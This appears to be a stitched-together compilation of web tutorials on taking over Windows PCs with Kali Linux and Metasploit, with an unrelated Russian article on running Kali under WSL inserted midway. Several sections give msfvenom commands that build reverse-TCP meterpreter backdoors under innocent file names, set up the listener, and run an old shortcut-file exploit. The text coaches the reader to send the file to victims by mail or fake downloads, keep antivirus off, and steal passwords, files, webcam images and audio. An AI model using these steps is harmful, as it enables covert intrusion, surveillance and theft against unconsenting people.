How To Hack Windows PC Using Kali Linux and Metasploit

Metasploit provides you with lots of exploits and payloads that you can use to hack any windows pc. In this post, i will show you how hackers use kali linux and metasploit to hack windows.

Just like RATs, you can create metasploit payloads and deliver them to your victim. Then you need to start a listener in metasploit to accept incoming connections. When your victim open the the file you will get a connection back and you can perform all short of tasks remotely.

Using this method hackers steal sensitive information like account details, login email and passwords, media files and much more like they can also execute system commands remotely and play with your system on root level. To get more Ethical Hacking tutorials, go to below link

So let’s see how hackers do that.

Step 1- In kali linux, open the terminal and use this command to generate payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -o newpic.exe

In this example, 192.168.43.1 is my and ip address (you need to use your ip address here) and 4444 is the port number that i want to use.

Now you will have a new payload file named newpic.exe (whatever name you used while creating payload) in root folder.

Step 2- You need to deliver this malicious file to your victim.

Step 3- Start the listener to accept incoming connection. Open terminal, type msfconsole and press enter to open the metasploit tool.

There is an exploit in metasploit used to handle reverse connections. We will use that. Enter these commands in terminal one by one to start the listener.

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.43.1

It will start listening for incoming connections over port 4444.

Step 4- Everything is up, now wait for your victim to click on your payload file and when your victim click and open the file you will get a session.

And that’s how hackers hack any windows pc. After getting session, you can perform all sort of tasks like uploading and downloading any file from and to victim’s system, screenshot capturing, capturing pictures using webcam, recording voice using mic and much more.

This is just an example of how hackers hack windows, there are lots of various methods you can use.

LINUX DIGEST

Follow Blog via Email

Hack Windows 7 with Metasploit using Kali Linux

Today i am gonna show how to exploit any windows OS using metasploit. Exploiting a windows vulnerability to logging into the system with out username and password using Metasploit.

Before Hacking, you want to know about metasploit framework. If your are new one to hacking, its less possible to know about Metasploit.

Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Requirements:

1. MetaSploit Installed ( Kali Linux Distribution)

2. Ruby Installed (Install all the package of Ruby to avoid any issues)

3. Two OS running either on same as virtual or physically different

4. Target host must not be running any AV

Machine 1: Host Kali Linux Machine

Machine 2: Target Windows 7 Machine

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-

supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams.

To launch msfconsole, enter msfconsole at the command line

Now once you get the msf prompt type the below command and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended.

Here above module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL.This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Now once we have found the desired module we will use this exploit by typing the below command.

#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image

Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.

A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. A reverse shell is a payload that

creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that

“binds” a command prompt to a listening port on the target machine, which the attacker can then connect.

#msf > set payload windows/meterpreter/reverse_tcp

Now its time to do some configuration for the exploit/payload that we have just set. type the given command

#msf > show options

You should get below default output.

Now we have to set the local host to listen. Type the given below two commands.

#msf > set SRVHOST 192.168.31.20

This will be your HOST IP address running metasploit.

#msf > set LHOST 192.168.31.20

This will be also be your HOST IP address running metasploit.

Now check if the above applied configuration is applied.

#msf > show options

Now Finally we will start to exploit. Run the command Exploit.

Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)

On any Client machine simply open Internet Explorer and try to open https://192.168.31.20

Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.

You can check the number of successful connected session by running the command sessons in msf console.

Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.

#meterpeter > session -i 1

Once connected type linux command to browse inside the System and have full control on it.

This Documentation is purely for educational purpose. so act with responsibility.

Hack Windows 10 In Kali Linux | windows 10 hacks

How To Hack Windows 10 in Kali Linux

Today I will tell you how you can hack window10 in Kali Linux. windows 10 hacks

Creating a Virus.

First of all, you have to open the terminal in your Kali Linux and then after that, you have to type some commands which you will find in the section of commands. With these commands, you can create a virus, by which you can put all the data on your computer by putting it on any computer or laptop.

Kali Linux – Starting the services and Tool. (windows 10 hack)

You can see that my virus has been created and its size is also mentioned here, after that we

will have to start some services for which you will find the commands in the command section.

After starting the services, you have to open a tool which is msfconsole so that you can control your virus and access the data of another laptop. To start the tool, you will find the command in the section of the command.

Kali Linux – Connect the Virus. ( windows 10 hack )

You can see that the msfconsole tool has been opened. Now we have to connect our tool with our virus. For which you have to write some commands first.

In the first command, you have to turn on your multi-handler, after that, you will have to set your payload which you gave while creating the virus. After doing all this, you will have to set your kali Linux IP, after that you will have to enter your port which you gave while creating the virus, after all this you have to type Exploit and then press Enter to connect Will be ready for.

After all this, the virus that you have created, you have to put in another laptop or computer which you want to hack and then it has to be run by double-clicking. I have inserted my virus inside my windows and also opened it is.

You can see that my tool has connected with my virus and a session has been opened and I have

a connection to another computer.

Kali Linux – System info. ( windows 10 hack )

You can get information about another computer with the Sysinfo command. After this your computer will be hacked, now you can put anything on the computer and you can also download any file from there.

Related Posts

Cross Site Scripting xss attack

May 25, 2020 May 29, 2020

System Hacking Kali Linux

April 21, 2020 May 2, 2020

Enumeration Ethical Hacking

April 20, 2020 May 2, 2020

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

Kali Linux в Windows

С введением подсистемы Windows для Linux (WSL) в Windows 10 появились новые возможности, такие как поддержка Linux дистрибутивов, в частности Ubuntu. В этой статье я расскажу, как с помощью этой подсистемы подключить Kali LInux в Windows среде не используя системы виртуализации.

Хотя работы Kali на Windows может быть не оптимальна из-за различных ограничений, все еще существует множество ситуаций, когда Kali Linux может быть необходим для использования совместно с Windows 10. Например это может быть консолидация рабочих областей, особенно если Windows является вашей основной рабочей средой. Также может быть полезна стандартизация инструментов и сценариев для работы в нескольких средах, быстрый перенос инструментов командной строки для тестирования проникновения в Linux для Windows и т. д.

Для того, чтобы установить Kali необходимо выполнить несколько шагов. В первую очередь необходимо включить и установить Windows Subsystem for Linux Command Reference — запустить powershell оболочку с правами администратора, выполнить команду и перезагрузить вашу машину:

После перезагрузки необходимо установить Ubuntu-environment:

Далее вам необходимо установить WSL Distribution Switcher. Эта программа предназначена для переключения подсистемы Linux для использования различных дистрибутивов Linux. Образы rootfs в настоящее время загружаются из репозиториев Docker Hub в виде исходников или prebuilt-сборок.

(Для клонирования проекта с git-репозитория необходимо установить git-клиент на Windows 10, например отсюда: https://git-scm.com/download/win, а также установить python для Windows).

Теперь, когда Kali-environment развернут на вашей Windows 10 вы можете вызвать его с помощью команды:

Далее вам необходимо обновить Kali Linux и установить кириллическую локализацию (при необходимости):

После развертывания Kali-environment мы можем установить необходимые утилиты и использовать их из Windows:

Таким простым способом вы получите современный дистрибутив для тестирования на проникновение в вашей Windows среде без запуска систем виртуализации, перезагрузок и прочего. Также, необходимо учесть, что из такой среды у вас не будут нормально работать утилиты по работе с железом, для вардрайвинга и т.д.

Hack Windows PC Using Kali Linux

Introduction: Hack Windows PC Using Kali Linux

Today lets see how to hack Windows PC using Kali Linux

Step 1: Creating the Payload

To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.

Open terminal and Type

msfvenom -p windows/meterpreter/reverse_tcp — platform windows-a x86 -f exe -o /root/Desktop/back.exe

Step 2: Starting the Metasploit Framework Console

For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux.

The Metasploit Framework Console has many payloads and many exploit method.

To start the Metasploit Framework Console. In the terminal type

msfconsole

Step 3: Choosing the Exploit Method

As I have said the Metasploit Framework Console has many exploitation method.

In this we will use the multi handler.

use exploit/multi/handler

Step 4: Setting the Payload

In above step we set our exploitation method. In this step we need to specify the payload that we have created.

set payload windows/meterpreter/reverse_tcp

Step 5: Providing Ip for Backdooring

In this step we need to provide the ip address of our machine so that the payload will connect to our system.

To find the ip address, open terminal and type ifconfig, and copy your ip address.

Then we have to set it in the msfconsole, so type

set LHOST (your ip address)

Step 6: Sending the File and Exploiting

After we have given all the information. We need to send the .exe file we created before to the victim via mail or fake downloads. make sure that the victim install the files.

After doing it, in the msfconsole command, type

exploit

After this command it will show you the victim terminal and you can control it.

Step 7: Watch the Video

You can watch the video for clarification

Be the First to Share

Did you make this project? Share it with us!